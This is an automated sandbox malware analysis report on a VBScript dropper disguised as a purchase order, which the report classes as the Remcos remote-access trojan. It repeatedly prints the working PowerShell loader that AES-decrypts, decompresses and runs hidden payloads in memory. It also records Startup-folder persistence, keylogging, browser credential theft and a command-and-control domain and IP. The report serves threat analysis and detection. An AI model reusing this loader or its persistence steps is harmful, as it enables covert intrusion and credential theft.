Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO#2195112.vbs

Overview

General Information

Sample name:PO#2195112.vbs
Analysis ID:1466651
MD5:0b3560c39b68490388b08e96e46a1dc6
SHA1:bf04e9d0e08954027bc797a1d3723026320d4fb9
SHA256:78d59fb49b75b46fa15aa5b9f9d69f7a83980486f12158783e619169aaac8884
Tags:RATRemcosRATvbs
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Installs a global keyboard hook
Maps a DLL or memory area into another process
Potential malicious VBS script found (has network functionality)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 712 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO#2195112.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 3472 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\dropped.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4828 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 1484 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 6836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 2432 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 6484 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7072 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 6408 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qungqkxv" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 3984 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qungqkxv" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 3004 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\bxtzrdixjge" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 2528 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4948 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 6184 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • powershell.exe (PID: 5112 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7072JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Base64 Encoded PowerShell Command Detected
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.D
    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.D
    Sigma detected: Suspicious Script Execution From Temp Folder
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1484, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp", ProcessId: 2432, ProcessName: powershell.exe
    Sigma detected: WScript or CScript Dropper
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO#2195112.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO#2195112.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO#2195112.vbs", ProcessId: 712, ProcessName: wscript.exe
    Sigma detected: Gzip Archive Decode Via PowerShell
    Source: Process startedAuthor: Hieu Tran: Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.D
    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO#2195112.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO#2195112.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO#2195112.vbs", ProcessId: 712, ProcessName: wscript.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", CommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\dropped.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3472, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", ProcessId: 1484, ProcessName: powershell.exe

    Data Obfuscation

    barindex
    Sigma detected: Drops script at startup location
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1484, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd

    Stealing of Sensitive Information

    barindex
    Sigma detected: Remcos
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1484, TargetFilename: C:\ProgramData\remcos\logs.dat

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: PO#2195112.vbsReversingLabs: Detection: 23%
    Source: PO#2195112.vbsVirustotal: Detection: 7%Perma Link
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior

    Software Vulnerabilities

    barindex
    Suspicious execution chain found
    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

    Networking

    barindex
    Connects to many ports of the same IP (likely port scanning)
    Source: global trafficTCP traffic: 64.188.16.157 ports 35890,0,3,5,8,9
    Potential malicious VBS script found (has network functionality)
    Source: Initial file: binaryStream.SaveToFile file, 2
    Uses dynamic DNS services
    Source: unknownDNS query: name: ab9001.ddns.net
    Source: global trafficTCP traffic: 192.168.2.6:49710 -> 64.188.16.157:35890
    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
    Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
    Source: powershell.exe, 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
    Source: powershell.exe, powershell.exe, 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
    Source: powershell.exe, 0000000E.00000002.2285095150.000000000319E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login,x equals www.facebook.com (Facebook)
    Source: powershell.exe, 0000000E.00000002.2285095150.000000000319E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login,x equals www.yahoo.com (Yahoo)
    Source: powershell.exe, 0000000E.00000002.2283024317.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
    Source: powershell.exe, 0000000E.00000002.2283024317.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
    Source: global trafficDNS traffic detected: DNS query: ab9001.ddns.net
